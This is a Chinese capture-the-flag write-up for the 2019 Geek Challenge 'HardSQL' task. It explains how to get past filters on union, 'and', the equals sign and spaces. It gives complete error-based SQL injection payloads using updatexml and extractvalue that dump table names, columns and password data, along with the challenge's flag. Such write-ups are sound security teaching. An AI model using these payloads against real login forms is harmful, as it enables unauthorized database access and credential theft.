[极客大挑战 2019]HardSQL

打开题目，发现这也还是一个SQL注入的题目。难度可能比之前的大，也就加了点过滤吧。
通过测试发现过滤了union，and，等于号，空格
可以使用updatexml或extractvalue报错注入法

查表：

?username=admin'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))%23&password=admin

查列：

?username=admin'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))%23&password=admin

查内容：

?username=admin'or(updatexml(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1)),0x7e),1))%23&password=admin

此时只得到了flag的左半部分，可以使用right()得到右半部分

?username=admin'or(updatexml(1,concat(0x7e,(select(group_concat(right(password,25)))from(H4rDsq1)),0x7e),1))%23&password=asdf

拼起来就可以得到flag了（记得去掉重复部分）
flag{21ef294f-3972-4f87-bd09-a5ea22ea3a34}

使用extractvalue报错注入法：
查表：

username=admin'or(extractvalue(1,(concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e))))%23&password=admin

查列：

username=admin'or(extractvalue(1,(concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e))))%23&password=admin

查内容：

username=admin'or(extractvalue(1,(concat(0x7e,(select(group_concat(password))from(H4rDsq1)),0x7e))))%23&password=admin

username=admin'or(extractvalue(1,(concat(0x7e,(select(group_concat(right(password,25)))from(H4rDsq1)),0x7e))))%23&password=admin